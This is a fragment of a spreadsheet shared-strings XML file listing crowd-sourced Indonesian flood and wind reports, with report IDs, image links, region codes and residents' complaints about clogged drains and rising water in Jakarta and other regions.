    <t>4f79aad1-f923-4e23-af17-23f863af2115</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4f79aad1-f923-4e23-af17-23f863af2115.jpg</t>
  </si>
  <si>
    <t>Banjir di 6 dusun desa pasir kec Mempawah hilir kab mempawah prov Kalimantan barat.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/eQ5mpsy7SCsVjnBVDcYrEZiStje3GzqCLJfpaPSPt5suQ_NiIQ-RrD3XPjRD_LvoCbPEZtQluUnNkgA5YQ2XRV_hyug=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1611", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>air comberan meluap dong gara-gara mampet ditengah beton sampe kedepan rumah warga nya tolong dong diperhatikan dong pak/bu. #BanjirKecil  #jakartabanjir"</t>
  </si>
  <si>
    <t>Cibubur</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/6aVVWs7GLSHd56UrdyDCIEu1NZ7SZakHV0HWTijyKz2OPDuRG2QlQfyc5vnWy4HeXZrKHMc5ww0gSSUx3IxRgTtzpAByXg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "1822", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl. Keutamaan Dalam RT/RW 015/04 Kelurahan Krukut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/XaK83EJEEpqNyx_vlm5hVdhPndBwD7-LhOr8wue307uY_5GcihX0Fs4skSH24dpPvUy6VOnn-uHfyro-phsfkezQeF5g=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil hujan baru sebentat tetapi jalanan sudah tergenang. tolong saluran2 air dikuras. terima kasih</t>
  </si>
  <si>
    <t>6eee2bf6-40e5-43b9-b69e-569c3b4f132c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6eee2bf6-40e5-43b9-b69e-569c3b4f132c.jpg</t>
  </si>
  <si>
    <t>hujan dari sekitar jam 8-9 malam</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lfB4IcCvognsOEzDaO6w2eeTMhTS5Iq6v0A7vl_C2NR_XPDtEAQAJ1H7h8phtlcQiQq6g8ohjX7eY-BjYMTIvI5v-vU=s480-c</t>
  </si>
  <si>
    <t>banjirrr sudaaah di taman ratu jl. ratu melati 4</t>
  </si>
  <si>
    <t>14e60a25-4c0d-47c4-8bea-7b2ecc65d20b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/14e60a25-4c0d-47c4-8bea-7b2ecc65d20b.jpg</t>
  </si>
  <si>
    <t>Kota ku butuh bantuan</t>
  </si>
  <si>
    <t>Kedamin Hulu</t>
  </si>
  <si>
    <t>Putussibau Selatan</t>
  </si>
  <si>
    <t>Kapuas Hulu</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/dL0CgTuLOMi6BIEI_RWvdmPu4d7O3IxoQgO3r6RVv18PCGWHwG9dFy260y8hrWHCjLz7pBGRHgz6W8jOFPioHzv79r8=s480-c</t>
  </si>
  <si>
    <t>karna saluran air tidak pernah dibersihkan akibatNya menimbulkan kemacetan tolong dibenahi terima kasih #BanjirKecil</t>
  </si>
  <si>
    <t>Cireundeu</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/4aRz3v91VrI_8CTGukicdYiLHl7Gp1oSLEOjhvovd4jGCvzWeWYIOoVC92_vx2UNuvAZG43fxiQkRtr2ZkY-h8tvdZc=s480-c</t>
  </si>
  <si>
    <t>longsor menutupi saluran air</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/_W3BKn2LEY62nCBxoQlsvymuL1ytKSsqQr8K-e1ubsClWwWq7SHQ6l2Z2WezQMSE1ljoKT8OK_JO0cAvcVhMEatjeUwQSg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1873", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jln kecil ini tdk ada saluran air ,bila hujan tembok warga rembas ,mohon di bantu pembuatan jln air ,</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/M26dhbOJQjWl2QM_q6q4RBCt_UgwOQ51a1tzHAC1_0NlZC8lirxpTqznEx9tv4KiheNxYkPJKZobGrUnZ8-A8cTfFHoP=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1894", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Mohon perbaikan saluran air ,dari sampah dan lain ,sudah tidak menampung bila hujan turun #BanjirKecil</t>
  </si>
  <si>
    <t>fc433abb-b7b2-48ce-91cf-2d7df41f55aa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fc433abb-b7b2-48ce-91cf-2d7df41f55aa.jpg</t>
  </si>
  <si>
    <t>Jika hujan deras dan durasi lama rawan banjir</t>
  </si>
  <si>
    <t>06ea23a2-bda5-484c-9240-4790fac07c5f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/06ea23a2-bda5-484c-9240-4790fac07c5f.jpg</t>
  </si>
  <si>
    <t>Terjadi banjir di sekitar wilayah cicurug</t>
  </si>
  <si>
    <t>Cicurug</t>
  </si>
  <si>
    <t>8ab76d5b-2048-4618-82ed-21a6f8e9affc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8ab76d5b-2048-4618-82ed-21a6f8e9affc.jpg</t>
  </si>
  <si>
    <t>Ketinggian 80 cm, hati2 bagi yg melintas</t>
  </si>
  <si>
    <t>Kayumanis</t>
  </si>
  <si>
    <t>Tanah Sereal</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/yIIq74gNyWdCGdOX-uTnglrk6sKOtRvZSFof1ih4Rt_45HnxaK3ZoN5aP5JBPpvHsC5RkKYXRXiKU1hB9H8bZWegA4CTpQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "272", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir disekita kantor kelurahan kemanggisan. Hujan hanya setengah jam, gak terlalu deras. sepertinya got depan kantor kelurahan mampet, perlu sering2 dicek</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lK0fDZDkncd6VT9imd6ZYZEE7pMnNHuQYS1wbJn0sSVMsHd82Ywv7kczaua4MRYzlZKTwNsVH1pXfNRtijVKjMA8CDgv=s480-c</t>
  </si>
  <si>
    <t>tolong donk got mampet dibersihin di jl. tanjung duren raya lama, klo hujan gede jadi genangan, dan air hujan dr genteng tidak bisa mengalir k selokan....</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/OoiQM7zHd6gdVVuuRqSsBlHNp8X4KZ3E8Zn8k9z1XS1F_hDxhx5jP-LWEBwF26o6YfipLJjsbzy3xl4Vkp7kMFzNjZ7wMw=s480-c</t>
  </si>
  <si>
    <t>jl. tanjung duren barat 1 banjir....! ini blm gede berkepanjangan. pemprov ngapain aja. musim ujan alamat kelelep lg!</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/LQqVaDsuHXrCbubouDdKxfUBRGxgIG0bp9pAEQjXzqOLmQbknjK6chX9X7s2DbH14yWUUNP9OJLo8pu9vt-OiFuKLBag=s480-c</t>
  </si>
  <si>
    <t>Hujan Lebat baru 1.20 jam tetapi saluran sudah meluap dan jalanan sudah tergenang. Tolong Penambahan Pompa Dan Perbaikan Saluran untuk satria. @aniesbaswedan @BangAriza</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/DNHAgcWWe3UrsVbz2fVtdZ8WekgAlqGVHgZEioDTirT_Flx3Kuip3bQkUgCWbJqv0yvlIV-JMrcBzHVY0DFKuL4JwWT5=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "35", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Wilayah rw 04 TDU terendam banjir</t>
  </si>
  <si>
    <t>c8a9f160-8137-4af9-b544-be0e7a53b0f7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c8a9f160-8137-4af9-b544-be0e7a53b0f7.jpg</t>
  </si>
  <si>
    <t>Hujan sejak 19.00</t>
  </si>
  <si>
    <t>Pondok Jagung Timur</t>
  </si>
  <si>
    <t>6628d5f9-a656-4e47-841b-da5bb6cedf7a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6628d5f9-a656-4e47-841b-da5bb6cedf7a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "173", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir ditaman FF sukabumi-selatan kebon-jeruk Jakarta-barat</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/dOtciG46SL913NGUiLV7s5sbI2xhVzJUYfbdY5wZdSjj6pvXQIKZWAazSWGjj6t4I35SvkwiAOd9SvXIBpvM3nHwIJE=s480-c</t>
  </si>
  <si>
    <t>banjir, pompanya donk..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/FcOZD2SUL_701l7I2gnyKmWFC0CFR7YGsJlb5u2H5QmA5gk4rUHuyf-9suCBp_e6BR5SJC6aQsqNHSV50MX7FMtLKKzGYA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1101", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Perumahan Taman Alfa Indah</t>
  </si>
  <si>
    <t>8b1d356f-0d8a-4deb-bfae-d3e0bc920926</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8b1d356f-0d8a-4deb-bfae-d3e0bc920926.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "270", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir kali grogol yg meluap</t>
  </si>
  <si>
    <t>82b81117-fe33-4eab-9c73-337cd2591e15</t>
  </si>
  <si>
    <t>https://images.petabencana.id/82b81117-fe33-4eab-9c73-337cd2591e15.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2625", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t xml:space="preserve">Telah terjadi banjir di jalan kapuk raya - Jakarta barat </t>
  </si>
  <si>
    <t>61fa0826-c9e4-4d2e-b19a-38af5fd24756</t>
  </si>
  <si>
    <t>https://images.petabencana.id/61fa0826-c9e4-4d2e-b19a-38af5fd24756.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "977", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Pulo Indah Raya Duri Kosambi Cengkareng Jakarta Barat</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/354538</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/09/21/1600700546746151608.jpg</t>
  </si>
  <si>
    <t>Banjir di Pos Pengumben Arah Joglo, Setengah Jalan Terendam</t>
  </si>
  <si>
    <t>Jalan pos pengumben mengarah ke joglo banjir tepat sebelum apartemen permata rksekutif. Hanya sisi sebelah kanan yang bisa dilalui, sepeda motor banyak yg terpaksa lawan arah untuk menghindari banjir</t>
  </si>
  <si>
    <t>983075fb-a5e1-496b-ac2d-d326fcc774f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/983075fb-a5e1-496b-ac2d-d326fcc774f9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2671", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sampai dengkul orang dewasa diwilayah Rt002/003 cengkareng timur</t>
  </si>
  <si>
    <t>1a7f5e0b-79ae-487c-a3a6-05a092a14a1e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1a7f5e0b-79ae-487c-a3a6-05a092a14a1e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2557", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>terpantau tumpeh gan</t>
  </si>
  <si>
    <t>3429f87b-30df-4295-9a5a-d11fd3c04542</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3429f87b-30df-4295-9a5a-d11fd3c04542.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2573", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Green garden</t>
  </si>
  <si>
    <t>82be6bf5-877e-431b-8c30-14672c916cfc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/82be6bf5-877e-431b-8c30-14672c916cfc.jpg</t>
  </si>
  <si>
    <t>Genangan titik kenal Lampu merah citraland sampai halte busway. Ketinggian 10-20 cm</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/7z2-ZAoht_jNkYeIAhpGSexJBSoYC3DIZVqqQRjDORYA3y0p5kDDTJcraXVq3l6jpP7UDYzluMt5QhDGrA7-h-RKqvLiVQ=s480-c</t>
  </si>
  <si>
    <t>banjirrrr</t>
  </si>
  <si>
    <t>ea9e30be-c94e-4da0-b139-345770565a98</t>
  </si>
  <si>
    <t>Hujan reda tapi air naik terus</t>
  </si>
  <si>
    <t>5638527a-7a75-4cac-b496-23da1f3e1ddd</t>
  </si>
  <si>
    <t>Tinggi air terus meningkat</t>
  </si>
  <si>
    <t>2c6d4e95-2212-48ac-b5e5-7b82a2149b48</t>
  </si>
  <si>
    <t>Air mulai naik</t>
  </si>
  <si>
    <t>f1eec81f-4d2d-4dba-a2c8-814180460f73</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f1eec81f-4d2d-4dba-a2c8-814180460f73.jpg</t>
  </si>
  <si>
    <t>Banjir sebatas mata kaki</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/F8xZhv6TDUyrR9uEl-noiCNs1vUz3YgG_6Q3C0QfuqZZpjLMgi02foBzpczAPtQoqLoYPgR2_0JTWYkaFqJy0xb0mbXJ=s480-c</t>
  </si>
  <si>
    <t>banjir geng hati2</t>
  </si>
  <si>
    <t>cbb58d4d-ff2b-4f8e-9cf1-b6edf0f5f1e4</t>
  </si>
  <si>
    <t>Depan perpustakaan dan perum grenvil</t>
  </si>
  <si>
    <t>2ecb05e7-fc6c-4f24-8964-233546b8b50f</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2651", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sebagian d rt006 Deket pinggir kali sekitar 60 cm...dan yg lain pun sudah masuk masih sekitar 30 cm...sebagian warga ada d mushola</t>
  </si>
  <si>
    <t>be191e53-3ee3-4447-b97c-e3afab1758f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/be191e53-3ee3-4447-b97c-e3afab1758f9.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi lutut orang dewasa kawasan kapuk bongkaran cengkareng jakarta barat</t>
  </si>
  <si>
    <t>df6bfe41-e4e4-4925-b93e-bc6cf0ad814e</t>
  </si>
  <si>
    <t>banjir rob tidak habis habiss mohon di perhatikan pak</t>
  </si>
  <si>
    <t>7bc7f279-ae85-4344-9d39-1ab7765daed2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7bc7f279-ae85-4344-9d39-1ab7765daed2.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 6, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir dalam rumah tadi kira2 jam 11 ..12 ..ada setengah betis...bbrp jam kmdiannuda mulai surut..sampai jam 4.16..dalam rumah smt kaki thks</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/a7tWfTW6g-EAEZaeevnCtxbXrmATHYJhYIQ0R80R5a-mOAZHwAMS95lMloVrXaiome7Y81PADg3bjO0rl7_lFt5ryvjj=s480-c</t>
  </si>
  <si>
    <t>Banjir Duri Kepa Kebon Jeruk Jakarta Barat... apakah pompa daerah Patra tidak menyala ? air tidak menggenang.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/PDBTJ2AycOtlcq7sE2TRtqcPpwyG0C1U5EYNUOX3PKbE3gkYQteW9qdlalgOwT1lsON32nUBX7sBJ-AEY4u5j_vxiGE=s480-c</t>
  </si>
  <si>
    <t>banjirrr... hujan reda tapi air makin naik...</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/QXaiOKRC_-uF5ASATZbHh8et2E9rTswDEm6yMQqhJZJ24sULKabM2FfoamFIAci-77UgB77aWvNQmVBMsiB_HWJFQ5U=s480-c</t>
  </si>
  <si>
    <t>#Banjir #JalurTerputus #SaluranAirTertutup #SaluranAirTertimbun</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/E9ETryvt7iSRs6W3HjOwJYkucArULi8qhLk3DIbnIRiosK0rTkeID5JPMu2vwwQtKh_CAv2WbpDa34_gTM8EjFDXRrrNrA=s480-c</t>
  </si>
  <si>
    <t>#SaluranTersumbat #SaluranKotor #KaliKotor #KerukKali #SampahDiSaluran #SaluranDitutup #SampahDiKali</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/354542</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/09/22/1600728394798644674.jpg</t>
  </si>
  <si>
    <t>Debit Air di Kali Ciliwung Meningkat, Bidara Cina Banjir</t>
  </si>
  <si>
    <t>Ciliwung dapat banjir kirimin, sekitar bidara Cina terkena banjir ini. Lokasi foto berada di Jalan Puskesmas, Tebet.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jUVmoARaenrK98_pHJ29dsnGIqWejnVVfnxdUdBtYQoN1tFMXNOSrz3B0UCvHRypXGqS7yOtazny3MJ6svFBS3UYNb-3=s480-c</t>
  </si>
  <si>
    <t>740978f1-cc56-420e-a0e0-80ef48b80d4e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/740978f1-cc56-420e-a0e0-80ef48b80d4e.jpg</t>
  </si>
  <si>
    <t>Greenville Blok BB. Got sudah penuh. Genangan tidak lebih dr 5cm</t>
  </si>
  <si>
    <t>ba5b5aa3-6e05-4446-8372-e5671bed726e</t>
  </si>
  <si>
    <t>banjir air pasang</t>
  </si>
  <si>
    <t>Rimba Sekampung</t>
  </si>
  <si>
    <t>Dumai Kota</t>
  </si>
  <si>
    <t>D U M A I</t>
  </si>
  <si>
    <t>4215bdcf-b65b-4ad4-aaff-690d1d5c939a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4215bdcf-b65b-4ad4-aaff-690d1d5c939a.jpg</t>
  </si>
  <si>
    <t>Hanya sebagian jalan yang banjir. Akibat peninggian jalan namun tidak menyesuaikan saluran air</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/354546</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/09/22/16007431521423284643.jpg</t>
  </si>
  <si>
    <t>Genangan Air Masih Rendam Jalan Raden Saleh Ciledug</t>
  </si>
  <si>
    <t>Jalan menuju komplek DDN Karang Tengah Ciledug Tangerang tampak masih tergenang, hujan deras semalam membuat jalan sempat tak bisa dilalui kendaraan karena air yang cukup tinggi. Lokasi tepatnya di Jalan Raden Saleh, Ciledug.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/V1DhlOqGIdAymSm3GzhGXXJGdNDu0tssGlb_Xjnr0JZWIFjor9UI21gc4_VgzW_QGDvFBtfo7dyQfb2C1fDrftOLJW2ibQ=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap ijin tanya  1bh pompa dari 4 pompa listrik dan 1bh garpu garukan dari 2 garpu garukan di saringan sampah di waduk Tomang dekat Grogol inn Jakbar sdh lama rusak. Kapan bisa diperbaiki?"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ipMsSO2lc64X2AHs_9hyiQBEWJehRDbdl8pFpeSsIKReSQGNVRWUhTrKl6nX7VangHVhCCNP5B14tKg0CYnnRf384tU=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil setiap hujan selalu seperti ini.. tak pernah teratasi.. hanya sesaat..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/WHz3dveLD-OzyYv0NRVmReEWuTuhCNkD6k8SLCnnV12nysOGV3LO2Q91IJlDtnSSsLDxejrBzlWP6pWlPntyXi5vmriQ=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil setiap hujan pasti seperti ini.. solusi tak kunjung terealisasi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/q1x6IROLDfUrAgd2zY4CyzB9vgyys700pCBWj4nit9yjHDCdIqzioKW3Su2cgeaXI4fh7ZEvDS0q1XOsz6rxh6cEh_8c=s480-c</t>
  </si>
  <si>
    <t>banjiiiirrrr.. Sampah ga ada tapi banjir.. keren khaaann..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/AdNCkpa5qnERZwNZQr8NQcOVMhLtRpcRsOx_aBrnINuTdKPJ1GAAInlqqVwZ53SRc1a-XOqFefJ6oFMXrmE5otlzyyn_CQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1969", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>masih ada genangan air nih di pintu rel deket lodan mohon pak di kondisikan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jiO0pQuxneyWAO8KpCopV3vEZw10acARGdpayylHYN9V4oQSzdDELAKysR-rqiT1oyRMr4j1UwTi5SJB4Ofy6UdJH5dibg=s480-c</t>
  </si>
  <si>
    <t>tolong di tl pak</t>
  </si>
  <si>
    <t>ddbb31b7-46c3-475f-a8e9-66274b47c0c4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ddbb31b7-46c3-475f-a8e9-66274b47c0c4.jpg</t>
  </si>
  <si>
    <t>Hujan deras dari siang mengakibatkan banjir disejumlah wilayah Painan Padang dan sekitarnya. Foto ini saya dapat dari salah satu temen Ig"</t>
  </si>
  <si>
    <t>Painan Selatan Painan</t>
  </si>
  <si>
    <t>Iv Jurai</t>
  </si>
  <si>
    <t>Pesisir Selatan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/tr_YZifFwJzEMcSWd7kPybaMB3dQvI6vZb_3XHAYNv0tPmoKt3AX_LhrSuSbQj2ovg7EgJgEAtETdF91xKhIsRT5p8p7Sw=s480-c</t>
  </si>
  <si>
    <t>tali air yang rusak  depan alfamidi layur raya berpotensi banjir dikarenakan ulah pedagang bebek madura dan warteg yang sering buang sampah padahal ppsu sering bersihkan tolong pak segera tindakannya makasih</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/354636</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/09/27/354636-1601168872418436209.mov-03.jpg</t>
  </si>
  <si>
    <t>Banjir di Jalan Husni Thamrin Hampir Mencapai 50 Cm</t>
  </si>
  <si>
    <t>Hujan menyebabkan banjir di Jl. Husni Thamrin/Dock Yard, Kelurahan Ratu Sima, Kecamatan Dumai Selatan, Kota Dumai. Para pengendara sepeda motor, dan mobil sebaiknya berhati-hati melintas di jalan tersebut karena ketinggian air hampir mencapai 50 Cm, dan</t>
  </si>
  <si>
    <t>Ratu Sima</t>
  </si>
  <si>
    <t>Dumai Selatan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lcOS5NFNX0ra_Byvb_o5g1J70vLt_U4frzmOzNrYtv6lBg-IdBxRNwV8jmUwVTg2oPUIr4PI3BMi0WGU4_cws94YE7No=s480-c</t>
  </si>
  <si>
    <t>bisa dibuat tempat penampungan air untuk membantu penampungan air dikala hujan besar</t>
  </si>
  <si>
    <t>3278b8ef-f9a0-4ac8-ab1f-9e92d7a13e0f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3278b8ef-f9a0-4ac8-ab1f-9e92d7a13e0f.jpg</t>
  </si>
  <si>
    <t>wind</t>
  </si>
  <si>
    <t>{ "report_type": "wind", "impact": 1 }</t>
  </si>
  <si>
    <t>Pohon tunbang dan terjadi longsoran kecil</t>
  </si>
  <si>
    <t>Nanggung</t>
  </si>
  <si>
    <t>8ab24b9f-e3c9-453b-9008-ab81144ed2d5</t>
  </si>
  <si>
    <t>{ "report_type": "wind", "impact": 0 }</t>
  </si>
  <si>
    <t>Melaporkan angin kencang lokasi kelurahan tj rejo medan sunggal tdk terlihat dampaknya.</t>
  </si>
  <si>
    <t>Tanjung Rejo</t>
  </si>
  <si>
    <t>Medan Sunggal</t>
  </si>
  <si>
    <t>dadcdc35-2f4f-4bbd-8c9b-d6145067dbfa</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-dadcdc35-2f4f-4bbd-8c9b-d6145067dbfa.jpg</t>
  </si>
  <si>
    <t>Di jalan lebih tinggi debit qirnya</t>
  </si>
  <si>
    <t>Cijantra</t>
  </si>
  <si>
    <t>Pagedangan</t>
  </si>
  <si>
    <t>https:--pasangmata.detik.com-contribution-354749</t>
  </si>
  <si>
    <t>https:--akcdn.detik.net.id-community-data-media-thumbs-pasangmata-2020-10-03-354749-1601688799492094262.mp4-03.jpg</t>
  </si>
  <si>
    <t>Tiang Listrik Ambruk Imbas Hujan Deras di Lorog Pacitan</t>
  </si>
  <si>
    <t>selain banjir karena hujan deras.Lorog pacitan pagi ini juga ada tiang listrik roboh (03-09-2020)</t>
  </si>
  <si>
    <t>Plalangan</t>
  </si>
  <si>
    <t>Jenangan</t>
  </si>
  <si>
    <t>Ponorogo</t>
  </si>
  <si>
    <t>d77f77dd-a471-4aa5-a8b2-f44aaa8ddeba</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-d77f77dd-a471-4aa5-a8b2-f44aaa8ddeba.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-MA" }</t>
  </si>
  <si>
    <t>Banjir di jalan baru kota ambon</t>
  </si>
  <si>
    <t>Kel Silale</t>
  </si>
  <si>
    <t>Nusaniwe</t>
  </si>
  <si>
    <t>Ambon</t>
  </si>
  <si>
    <t>Maluku</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-GeUkx-ET4V5zegoB6SULtQZruuEMOf8W8ubqqXVqtz8j8hpgEQiobo8pzgdQxzqfeUa4LcJuzkgqwffPwYMPPe9eMCk=s480-c</t>
  </si>
  <si>
    <t>tolong tindakan lanjut agar tidak banjir</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-qgIn_YwhloYknTa1cFo_1bzAWp7hK4h-cekar-Z3ZxiZiawdrGoZcusHM5dkx-UbFyNM4V0mORZtlKsr2aSST8RpAYBR=s480-c</t>
  </si>
  <si>
    <t>sudah mulai banyak sampah di lokasi ini agar tidak terjadi banjir tolong ditindak lanjud supaya gak ada nyamuk dan warga gk kena DBD</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-bAwIGQq0r2V06NQXElxJUOfeYfxCj-eft2l9KP4yTslkOFypfwTpZG4zMNIN1Tnlc5PPTk14SfWR2VM_lzi1tCm4IRA=s480-c</t>
  </si>
  <si>
    <t>tolong saluran air nya #BanjirKecil</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-fVcFhwxqvsIT_ImH1LMBheQvtEL5XCEYZnAEYIzdDjXw5_-yTMIvFe9OsMtR9d9DHnKvlFBJV0tM7ZGwxfxICFyfObQFuA=s480-c</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-ubr7yZhwfbQRKcFOcXYtm1dIU8dxXfMGWYIBr6p5HzkcgcxIjuqSqhKiwMcXQTap8fsu7J5TJG1YVlumz0NeWbWJf8E=s480-c</t>
  </si>
  <si>
    <t>kali meluap.. banjir sudah sebetis orang dewasa.., tolong pompa dipastikan hidup</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-mT372SczucU2QWeWD-1bHQ241fq06X-dCi4_3UqExaxqahoZRNbrxg0clq8E-28nno9uym4IuiTFS-1CXCCXvhmti846=s480-c</t>
  </si>
  <si>
    <t>Tolong Untuk Bantu warga pejaten Barat, tepatnya di pemukiman Dekat Masjid AL Jabbar, hampir setiap hujan beberapa menit banjir selalu datang Dan kemarin Hari sabtu tanggal 3 Oktober 2020 kami kebanjiran Dan Sekarang, Minggu Tanggal 4 Oktober 2020 jam 21</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-vwiSdhssFuZG8KNQVr8FWGrV0QKu2HKl13kqYRxQlRkSzdfnEFIVPCvlf9lp2sOuGNfdwiPGyycrfS6M_-nGdA5-Uxpk=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil #BanjirBandang #BanjirKiriman ini buku anak Saya dan baru saja kering dan sekarang banjir lagi.... TOLONG PAK CAMAT, PAK LURAH, PAK GUBERNUR DAN PIHAK TERAIT.... CEK DILAPANGAN KHUSUSNYA DI KELURAHAN PEJATEN BARAT TEPATNYA DI PEM</t>
  </si>
  <si>
    <t>https:--lh3.googleusercontent.com-cwR1_-OcrpVXpSJaLNVgB0fYEEXVHLaIHBaKnEsUHOmMyH758I99UggmwlaCZaJa6hYKgGg3CkbXr0OrvJXksnrH95b0=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil #BanjirBandang #BanjirKiriman AIR SUDAH MULAI NAIK DAN SEKITAR 30 KEPALA KELUARGA DI PEMUKIMAN JAKARTA SELATAN, TEPATNYA DI KELURAHAN PEJATEN BARAT DI AREA MASJID ALJABBAR ATAU DI SAMPING PERUMAHAN PEJATEN ELOK KEMBALI NAIK, MELU</t>
  </si>
  <si>
    <t>40f0465e-ca1e-4508-9082-6ec4f18f276c</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-40f0465e-ca1e-4508-9082-6ec4f18f276c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1082", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>0d0476ee-58f8-4535-935d-36738342214d</t>
  </si>
  <si>
    <t>Pancoran Mas</t>
  </si>
